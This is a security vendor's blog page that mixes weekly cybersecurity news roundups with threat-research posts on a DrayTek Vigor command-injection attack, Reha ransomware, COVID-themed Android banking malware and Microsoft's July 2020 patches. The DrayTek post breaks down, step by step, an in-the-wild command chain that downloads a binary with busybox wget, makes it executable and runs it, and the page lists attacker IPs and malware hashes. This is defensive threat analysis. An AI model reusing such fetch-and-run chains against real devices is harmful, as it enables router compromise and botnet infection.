Cybersecurity News & Trends – 07-24-20

/0 Comments/in /by

This week, SonicWall reveals what the “new business normal” looks like for cybercriminals in the mid-year update to the 2020 Cyber Threat Report.

SonicWall Spotlight

SonicWall Report: COVID-19 Has Created ‘Boon’ For Criminals — ZDNet

  • In an article on SonicWall’s Mid-Year Threat Report, ZDNet highlights findings that hackers have shifted their strategies due to COVID-19.

The 2020 Rising Female Stars Of The IT Channel — CRN

  • SonicWall is proud to announce one of its own, Tiffany Haselhorst, has joined other leaders within the IT channel community on CRN’s esteemed 2020 list of 100 Rising Female Stars.

Cyberthreat landscape changes to meet new business normal of Work From Home: SonicWall — Channelbuzz.ca

  • In an article on SonicWall’s Mid-Year Threat Report, Channelbuzz highlights how cybercriminals have evolved their tactics to better exploit remote work environments during the pandemic.

Malware Attacks Down As Ransomware Increases — BetaNews

  • In an article on SonicWall’s Mid-Year Threat Report, BetaNews highlights findings that malware has dropped 24% and ransomware has increased 20% globally and 109% in the U.S.

Cybersecurity News

Using Robust Tools, Cybercriminals Accelerate Their Own Digital Transformation — SiliconANGLE

  • In the online underground, crime not only pays, but attackers are rapidly developing tools and networks that rival those of legitimate enterprises today.

Blackbaud Hack: Universities lose data to ransomware attack — BBC

  • At least seven universities in the UK and Canada have had student data stolen after hackers attacked a cloud computing provider.

Ongoing Meow attack has nuked >1,000 databases without telling anyone why — Ars Technica

  • Just hours after a world-readable database exposed a wealth of sensitive user information, UFO made the news again, this time because a database that stored user details was destroyed in an attack.

Apple’s Hackable iPhones Are Finally Here — Wired

  • Last year, Apple announced a special device just for hackers. The phone — for approved researchers only — will soon go into circulation.

New cryptojacking botnet uses SMB exploit to spread to Windows systems — Bleeping Computer

  • A new cryptojacking botnet is spreading across compromised networks via multiple methods that include the EternalBlue exploit for Windows Server Message Block (SMB) communication protocol.

Ransomware attack locked a football club’s turnstiles — ZDNet

  • Cyber criminals are targeting sports teams, leagues and organizational bodies — and in many cases, their attacks are successful, warns the NCSC.

Lazarus hackers deploy ransomware, steal data using MATA malware — Bleeping Computer

  • A recently discovered malware framework, known as MATA and linked to the North Korean-backed Lazarus hacking group, was used in attacks targeting corporate entities from multiple countries.

House-passed defense spending bill includes provision establishing White House cyber czar — The Hill

  • The House version of the annual National Defense Authorization Act included a provision establishing a national cyber director, a role that would help coordinate federal cybersecurity efforts.

Hackers use recycled backdoor to keep a hold on hacked e-commerce server — Ars Technica

  • Easy-to-miss script can give attackers new access should they ever be booted out.

Twitter Hack Revives Concerns Over Its Data Security — The Wall Street Journal

  • The alleged perpetrator, who called himself ‘Kirk,’ was part of a subculture where hackers trade in coveted social-media accounts.

In Case You Missed It

Draytek Vigor Remote Code Execution vulnerability attacks spotted in the wild

/in /by

DrayTek is a manufacturer of broadband CPE (Customer Premises Equipment), including firewalls, VPN devices, routers and wireless LAN devices. Vigor3900/2960 is a Quad-WAN broadband router/VPN gateway product.Vigor300B is a Quad-WAN load balancing broadband router that runs on the linux system.

Command-injection vulnerabilities (CVE-2020-14472) exists in the mainfunction.cgi file in the Draytek Vigor3900, Vigor2960, and Vigor 300B devices before version 1.5.1.1 . This can lead to remote code execution.

Sonicwall Capture Labs threat research team has spotted attacks exploiting this vulnerability in the wild.

Following are some examples :

Decoding the urls

The discussion below provides an analysis of the attack:

IFS is Internal Field Separator that the shell treats each character of $IFS as a delimiter. If IFS is not set then the default  sequence  is<space>, <tab>, and <newline>. So, in above attack ${IFS} is <space>. This means the attack constitutes of following commands

/bin/sh -c this will launch bash and execute the command that follows.

cd /tmp; will change the directory to tmp.

rm rf arm7; will delete all the files named arm7.

busybox wget <attacker’s website>; this will download a malicious file(arm7) from attacker’s domain. BusyBox is a software suite that provides several Unix utilities in a single executable file. It runs in a variety of POSIX environments such as Linux, Android, and FreeBSD.

chmod 777 arm7; makes the file readable,writable and executable by everyone.

./arm7; executes the binary which is potentially malicious

A quick check on shodan reveals certain vulnerable devices

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • IPS 15089:Draytek Vigor Remote Code Execution

IoCs
192.3.45.185
1.203.161.58
1.203.161.58
1.203.161.58
100.33.144.84
100.38.122.182
101.108.97.145
102.66.104.204
103.209.1.230
103.238.200.62
103.4.65.78
103.55.91.146
103.55.91.146
109.237.147.16
115.133.81.181
115.85.32.210
117.6.168.102
118.70.133.196
118.70.190.137
121.32.151.178
122.176.27.17
123.24.205.232
134.19.215.196
134.90.254.172
145.220.25.28

Reha ransomware targeting Arabic speaking countries.

/in /by

The SonicWall Capture Labs threat research team observed reports of a new variant family of Reha ransomware [Reha.RSM] actively spreading in the wild.

The Reha ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

The ransomware targeting Arabic speaking countries and designed for very specific region.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ [Name]. < .Try2Cry >
    • %App.path%\ [Name]. < .txt > recovery instruction

Once the computer is compromised, the ransomware runs the following commands:

The ransomware encrypts all the files with following extensions and appends the [Try2Cry] extension onto each encrypted file’s filename.

*.doc,*.ppt,*.jpg,*.xls,*.pdf,*.docx,*.pptx,*.xlsx

During our analysis, we have noticed the malware using a packer called DNSgaurd to avoid detection by sandboxes in the wild.

This makes our jobs harder to create a Decryptor tool for this ransomware.

However with some dynamic techniques we were able to inject our tool into the ransomware process and extract some valuable data that proves this is a ransomware.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

 

Translated to English:

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWall Capture Labs threat research team provides protection against this threat via the following signatures:

  • GAV: REHA.RSM (Trojan)
  • GAV: Invader.H_176 (Trojan)
  • GAV: Pitit.A (Trojan)

 

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

New Cyber Threat Intelligence Finds Malicious Office Files Spiking, Ransomware Up during COVID-19 Pandemic

/0 Comments/in /by

Explore the Mid-Year Update to the 2020 SonicWall Cyber Threat Report

With the arrival of the COVID-19 pandemic in the first half of 2020, cybersecurity entered uncharted territory. As organizations worked to connect and secure millions of new remote workers, opportunistic attackers began seizing on the distraction, confusion and lack of preparedness surrounding the pandemic.

We may know how we plan to respond to the “new business normal,” but how are cybercriminals responding? To find out, SonicWall Capture Labs threat researchers have been investigating, analyzing and exploring new threat trends, tactics, strategies and attacks.

“This latest cyber threat data shows that cybercriminals continue to morph their tactics to sway the odds in their favor during uncertain times,” said SonicWall President and CEO Bill Conner. “With everyone more remote and mobile than ever before, businesses are highly exposed and the cybercriminal industry is very aware of that.”

To shed some light on what cybercrime’s new business normal looks like, SonicWall Capture Labs threat researchers are sharing exclusive threat intelligence in the mid-year update to the 2020 SonicWall Cyber Threat Report.

Download the exclusive mid-year report to explore the stories, behaviors and trends that are helping shape our new IT reality from the ground up.

COVID-19 the perfect backdrop for chaos.

SonicWall Capture Labs threat researchers found no shortage of cybercriminals leveraging the fear and uncertainty around the COVID-19 pandemic to get the upper hand. COVID-19 sparked malware across all continents in March, pushing the chance an organization would see a malware attack above 35%. SonicWall began seeing attacks, scams and exploits specifically based around COVID-19 on Feb. 4, and since then have detailed at least 20 different types of attacks across just about every category.

Malware volume dips again.

In 2019, fresh off the previous year’s all-time record high of 10.52 billion attacks, malware dropped 20%, to 4.8 billion malware attacks. Fortunately, during the first six months of 2020, that trend accelerated. SonicWall recorded 3.2 billion malware attacks in the first half of 2020, a 33% drop compared to the same time period last year.

Ransomware continues to climb.

As malware falls, ransomware appears to be taking up the slack. By comparing the first halves of 2019 and 2020 ransomware data, we see that not only is ransomware rising, it’s also rising faster.

Attacks against non-standard ports reach new highs.

For the first half of 2020, both Q1 and Q2 set records for number of attacks going through non-standard ports. In February, non-standard port attacks reached a record of 26% before climbing to an unprecedented 30% in May. The updated report explains why this is a critical issue for organizations.

Office files leveraged for malicious agenda.

In the first half of 2020, Office files and PDFs made up a third of all new malicious files identified by SonicWall Capture Advanced Threat Protection (ATP). What’s more concerning? Malicious Office files are up a staggering 176% this year.

Cryptojacking is alive and well.

After Coinhive closed in March 2019 and attacks plummeted in the second half of the year, the death of cryptojacking seemed imminent. But readily available alternatives and an increase in the value of cryptocurrencies have pushed cryptojacking in North America far above the levels recorded in the second half of 2019.

IoT attacks spike.

With a massive increase in the number of people working from home, criminals now have a potential back door to corporate networks through employees’ (often poorly secured) home IoT devices. Combined with an increase in the number of IoT devices in use and other factors, this has led to a huge increase in the number of IoT attacks.

SonicWall’s Tiffany Haselhorst Joins 2020 CRN 100 Rising Female Stars List

/0 Comments/in /by

SonicWall is proud to announce one of its own, Tiffany Haselhorst, joins an esteemed list along with other leaders within the IT channel community. Today, CRN, a brand of The Channel Company, named her to its 2020 list of 100 Rising Female Stars.

“CRN’s 2020 100 Rising Female Stars list honors leaders who are poised to impact the industry for many years. They are accelerating the growth of their companies through excellent direction and innovation in their field,” said Blaine Raddon, CEO of The Channel Company. “The accomplishments of these women are reshaping the IT channel, and we are proud to honor their achievements.”

The 100 Rising Female Stars list is making its debut this year with channel leadership candidates selected by the CRN editorial team. The final honorees are chosen based on their demonstrated leadership, expertise, innovation and ongoing dedication to the IT channel.

This talented group of women contribute to the development and strategies of their organization’s channel partner programs and exude excellence in areas such as partner engagement, program management and marketing.

“Threat intelligence solutions have never been more vital for an organization’s online safety. I look forward to my continued work with partners to ensure they have the answers to the problems their customers seek to fix,” said Tiffany Haselhorst, Senior Sales Manager at SonicWall. “I’m honored to be recognized amongst so many of these women who I know work as equally hard to provide partners with the support, education and tools they need to exceed their goals and achieve success.”

SonicWall is home to the award-winning SecureFirst Partner program designed to help partners build a highly profitable security practice and offers a range of partnership tiers with varied requirements and associated benefits. It includes SonicWall University, a convenient online learning platform designed to help SecureFirst Partner sales representatives, sales engineers and support engineers stay at the forefront of today’s cyber threats and critical cybersecurity solutions.

The 2020 list of 100 Rising Female Stars will be featured in a special July issue of CRN Magazine and online at www.CRN.com/risingstars.

450+ Financial Android apps targeted by a multifaceted malware that uses Covid theme

/in /by

SonicWall RTDMI engine recently detected an Android malware which pretends to look like a CoViD info app. It is an all in one malware which has functionalities of Banking Trojan, Spyware, Keylogger and Ransomware.

Non-existence of this malicious file at the time of detection on popular malware search portals like the VirusTotal and the Reversing Labs indicates the effectiveness of the RTDMI engine.

 

For an app which is circulated as a provider of CoViD Information, unwarranted permissions are requested which makes it suspicious:

                (permissions requested)

 

When the application is launched, a message to enable accessibility for “CovidSar2” is prompted continuously while malicious code is executed behind the scene. The app hides itself from the app list:

 

To evade detection from Google’s built-in malware protection, the app asks to disable Google Play Protect:

 

The app targets 457 applications by their package name. Targeted apps belong to banking, shopping, trading, finance & crypto wallet categories:

( Targeted package name Part1)

 

(Targeted package name Part2)

 

Technical Analysis:

Checking whether the app is running in a virtual environment:

 

The app hides its icon from the device which makes it difficult for the user to identify the app responsible for the activity:

 

Code to disable Google Play Protect:

 

It fetches installed application information from victim’s device which is later encrypted and sent to the C&C server “hxxps://tr3kjnf[.]xyz”:

 

It also has code which finds the app in the foreground, and accordingly gets an overlay page from the server:

 

Applications which use two-factor authentications for sign-in could possibly be compromised as it has the capability to read incoming messages including OTP:

 

The app has saved list of supported malicious commands in a locally saved configuration file named “set.xml”:

 

To fulfill the desired functionalities malware author has used the following commands:

del_sws: Delete incoming/outgoing messages:

 

gps: Sends victim’s location details:

 

getNumber: Reads contact numbers from phonebook:

 

spamSMS: Send spam SMS to numbers specified in the configuration file:

 

block_notification: Disable notifications from the specified package:

 

crypt / decrypt: Encrypts/decrypts a file with RC4 algorithm and adds/removes “.AnubisCrypt” extension:

 

htmllocker: Lock the screen and display ransom note:

 

findfiles: Searches files inside specific folder names and send them to the C&C server:

 

StartRecordSound: Taking recorded device audio with the current date and time in “.amr” extension:

 

SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.

 

Indicator of Compromise(IOC):

  • 04e16d09eec3a839506e7938516ca26b

 

Evidence of detection by RTDMI ™ engine can be seen below in the Capture ATP report for this file:

Cybersecurity News & Trends – 07-17-20

/0 Comments/in /by

This week, between breaches at Twitter, compromise at Citrix and cyberattacks against COVID-19 vaccine manufacturers, the case for a U.S. national cyber director got even stronger.

SonicWall Spotlight

Russian Cyber Espionage Group is Trying to Steal U.S. COVID-19 Vaccine Research — Newsweek International

  • SonicWall CEO and GCHQ advisor Bill Conner said, “Russia happens to be the first country placed in the spotlight, but it was only a matter of time before a nation state resorted to cybercrime to influence or control global healthcare during a time of great need. … [Cyber] criminals tend to follow the money trail, thus putting a massive bounty on anything vaccine-related.”

Cybersecurity News

Honeywell Sees Rise in USB-Borne Malware That Can Cause Major ICS Disruption — Security Week

  • Honeywell says it has seen a significant increase over the past year in USB-borne malware that can cause disruption to industrial control systems.

Malware adds online sandbox detection to evade analysis — Bleeping Computer

  • Malware developers are now using Any.Run malware analysis service in an attempt to prevent their malware from being easily analyzed by researchers.

This botnet has surged back into action spreading a new ransomware campaign via phishing emails — ZDNet

  • There’s been a big jump in Phorpiex botnet activity – but it’s a trojan malware attack that was the most common malware campaign in June.

New AgeLocker Ransomware uses Googler’s utility to encrypt files — Bleeping Computer

  • A new and targeted ransomware named AgeLocker utilizes the ‘Age’ encryption tool created by a Google employee to encrypt victims’ files.

The case for a National Cyber Director — Cyberscoop

  • Although the effects of COVID-19 will last for years, it’s already clear that shifting more activity online has increased our society’s digital dependence even faster than expected.

‘DdoS-For-Hire’ Is Fueling a New Wave of Attacks — Wired

  • Turf wars are heating up over routers that fuel distributed DDoS attacks.

New Mirai Variant Surfaces with Exploits for 9 Vulnerabilities Products — Dark Reading

  • Impacted products include routers, IP cameras, DVRs, and smart TVs.

TrickBot malware mistakenly warns victims that they are infected — Bleeping Computer

  • The notorious TrickBot malware accidentally included a test module that’s warning victims that they are infected and should contact their administrator.

Russian Hackers Blamed for Attacks on Vaccine-Related Targets — The Wall Street Journal

  • U.S. and U.K. government officials said a prominent state-backed Russian hacking group is responsible for ongoing cyberattacks against organizations involved in the development of coronavirus vaccines and other healthcare-related work.

A Brazen Online Attack Targets V.I.P. Twitter Users in a Bitcoin Scam — The New York Times

  • In a major show of force, hackers breached some of the site’s most prominent accounts, a Who’s Who of Americans in politics, entertainment and tech.

Citrix: No breach, hacker stole business info from third party — Bleeping Computer

  • Citrix has published an official statement to deny claims that the company’s network was breached by a malicious actor who says that he was also able to steal customer information.

In Case You Missed It

Malicious Android apps continue to use the Covid theme to spread different types of malware

/in /by

Android malware with Covid related themes continue to spread. SonicWall Capture Labs threats research team has observed different types of Android malware propagated by using the Covid-19 theme. This blog highlights some of our findings.

 

Dialer malware

  • Md5:e3475bc75d6d7225b3313942829f03bc
  • Package name: Mobile.bright
  • Application name: Corona virus

 

  • Md5: 4afe0e25e60504506a8005b58bdc74f8
  • Package name: com.my.photo.effect
  • Application name: COVID 19 UPDATE NEWS

 

  • Md5: 4161a3c2f04c60d7425ca0dbf08051d2
  • Package name: corona.virus.checkee
  • Application name: corona virus checker

 

Malicious dialers often contain telephone numbers to premium numbers. These dialers work in the background and dial telephone lines at other locations, causing the victims to incur expensive phone bills.

The samples listed below spread using Covid-19 related themes but do not perform the functions advertised. The samples contain hardcoded telephone numbers as shown below:

Coronavirus stats with suspicious functionalities

  • Md5: 42f2eda86a8fba07a0f389fec0a6e95b
  • Package name: dulcidion.coronainfo
  • Application name: Corona Info

This app presents itself as a live information provider for global Covid-19 related infections. In the background it uses a freely available API to gather the statistics.

Interestingly, this API has been connected to both malicious and non-malicious executable and apk applications. This further shows how malicious applications are providing relevant information while hiding their malicious content.

This app claims to provide information about Covid-19 infections in different parts of the world. However, it contains a number of suspicious functionalities within its code that look out of place considering what it claims to do:

Checking for root status of the device:

Clipboard functionality:

Checking if vpn is being used:

Checking if emulator,VirtualBox or Genymotion is being used:

 

Remote Access Trojans

  • Md5: 6ae422acd978c308e139456d674f719b
  • Package name: dkjfxgcxkumbroynfd.sizqhephspmlculghrpkmnb.bmkfzwiobchswd
  • Application name: COVID-19

 

  • Md5: 439be2e754cfc5795d1254d8f1bc4241
  • Package name: wfwcjawnldylkf.jlhhtjzefayylrzalmjg.msblgakkhbfpyahkugaezmxrsu
  • Application name: V-Alert COVID-19

 

Both these apps request accessibility service access after execution and keep showing the request window until access is granted. In the background the app (md5: 439be2e754cfc5795d1254d8f1bc4241) communicates with a specific twitter account to receive commands:

The shared_prefs folder contains a file – set.xml which contains a number of supported commands. A few dangerous commands from the list include:

  • keylogger
  • cryptfile
  • spamSMS
  • recordsound
  • vnc_start_new
  • htmllocker
  • textPlayProtect

We have covered a similar Android malware in more detail in one of our previous blogs.

Both the apps contain packed code which introduces a number of class files containing junk code. Upon execution both the apps drop a .json file in the app folder, however this is a .dex file in reality. This .dex file contains code related to malicious functionalities like collecting GPS location and sending SMS messages:

 

SonicWall Capture Labs provides protection against this threat with the following signatures:

  • Dialer.TL_3 (Trojan)
  • Presnoker.AN (Trojan)
  • Cerberus.BN (Trojan)

 

Indicators Of Compromise (IOC’s):

  • 439be2e754cfc5795d1254d8f1bc4241
  • 6ae422acd978c308e139456d674f719b
  • 42f2eda86a8fba07a0f389fec0a6e95b
  • 4161a3c2f04c60d7425ca0dbf08051d2
  • 4afe0e25e60504506a8005b58bdc74f8
  • e3475bc75d6d7225b3313942829f03bc

Microsoft Security Bulletin Coverage for July 2020

/in /by

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of July 2020. A list of issues reported, along with SonicWall coverage information are as follows:

CVE-2020-1147 .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
ASPY 5964:Malformed-File exe.MP.144

CVE-2020-1350 Windows DNS Server Remote Code Execution Vulnerability
IPS 15069:Windows DNS Server Remote Code Execution (CVE-2020-1350)

CVE-2020-1374 Remote Desktop Client Remote Code Execution Vulnerability
ASPY 5966:Malformed-File exe.MP.146

CVE-2020-1381 Windows Graphics Component Elevation of Privilege Vulnerability
SPY 5965:Malformed-File exe.MP.145

CVE-2020-1382 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 5967:Malformed-File exe.MP.148

CVE-2020-1399 Windows Runtime Elevation of Privilege Vulnerability
ASPY 5968:Malformed-File exe.MP.149

CVE-2020-1403 VBScript Remote Code Execution Vulnerability
IPS 14849:Suspicious JavaScript/VBScript Code 56

CVE-2020-1410 Windows Address Book Remote Code Execution Vulnerability
ASPY 5963:Malformed-File wab.MP.1

CVE-2020-1426 Windows Kernel Information Disclosure Vulnerability
ASPY 5962:Malformed-File exe.MP.147

Following vulnerabilities do not have exploits in the wild :

CVE-2020-1025 Microsoft Office Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1032 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1036 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1040 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1041 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1042 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1043 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1085 Windows Function Discovery Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1240 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1249 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1267 Local Security Authority Subsystem Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1326 Azure DevOps Server Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-1330 Windows Mobile Device Management Diagnostics Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1333 Group Policy Services Policy Processing Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1336 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1342 Microsoft Office Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1344 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1346 Windows Modules Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1347 Windows Storage Services Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1349 Microsoft Outlook Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1351 Microsoft Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1352 Windows USO Core Worker Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1353 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1354 Windows UPnP Device Host Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1355 Windows Font Driver Host Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1356 Windows iSCSI Target Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1357 Windows System Events Broker Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1358 Windows Resource Policy Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1359 Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1360 Windows Profile Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1361 Windows WalletService Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1362 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1363 Windows Picker Platform Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1364 Windows WalletService Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1365 Windows Event Logging Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1366 Windows Print Workflow Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1367 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1368 Windows Credential Enrollment Manager Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1369 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1370 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1371 Windows Event Logging Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1372 Windows Mobile Device Management Diagnostics Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1373 Windows Network Connections Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1375 Windows COM Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1384 Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1385 Windows Credential Picker Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1386 Connected User Experiences and Telemetry Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1387 Windows Push Notification Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1388 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1389 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1390 Windows Network Connections Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1391 Windows Agent Activation Runtime Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1392 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1393 Windows Diagnostics Hub Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1394 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1395 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1396 Windows ALPC Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1397 Windows Imaging Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1398 Windows Lockscreen Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1400 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1401 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1402 Windows ActiveX Installer Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1404 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1405 Windows Mobile Device Management Diagnostics Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1406 Windows Network List Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1407 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1408 Microsoft Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1409 DirectWrite Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1411 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1412 Microsoft Graphics Components Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1413 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1414 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1415 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1416 Visual Studio and Visual Studio Code Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1418 Windows Diagnostics Hub Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1419 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1420 Windows Error Reporting Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1421 LNK Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1422 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1423 Windows Subsystem for Linux Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1424 Windows Update Stack Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1427 Windows Network Connections Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1428 Windows Network Connections Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1429 Windows Error Reporting Manager Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1430 Windows UPnP Device Host Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1431 Windows AppX Deployment Extensions Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1432 Skype for Business via Internet Explorer Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1433 Microsoft Edge PDF Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1434 Windows Sync Host Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1435 GDI+ Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1436 Windows Font Library Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1437 Windows Network Location Awareness Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1438 Windows Network Connections Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1439 PerformancePoint Services Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1442 Office Web Apps XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1443 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1444 Microsoft SharePoint Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1445 Microsoft Office Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1446 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1447 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1448 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1449 Microsoft Project Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1450 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1451 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1454 Microsoft SharePoint Reflective XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1456 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1458 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1461 Microsoft Defender Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1462 Skype for Business via Microsoft Edge (EdgeHTML-based) Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1463 Windows SharedStream Library Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1465 Microsoft OneDrive Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1468 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1469 Bond Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1481 Visual Studio Code ESLint Extention Remote Code Execution Vulnerability
There are no known exploits in the wild.

Windows DNS Server Remote Code Execution Vulnerability CVE-2020-1350

/in /by

A remote code execution vulnerability exists in Windows Domain Name System servers when certain requests are not properly handled. This issue results from a flaw in Microsoft’s DNS server role implementation. An attacker who successfully exploits the vulnerability could run arbitrary code in the context of the Local System Account. Windows servers that are configured as DNS servers are at risk as a result of this vulnerability.

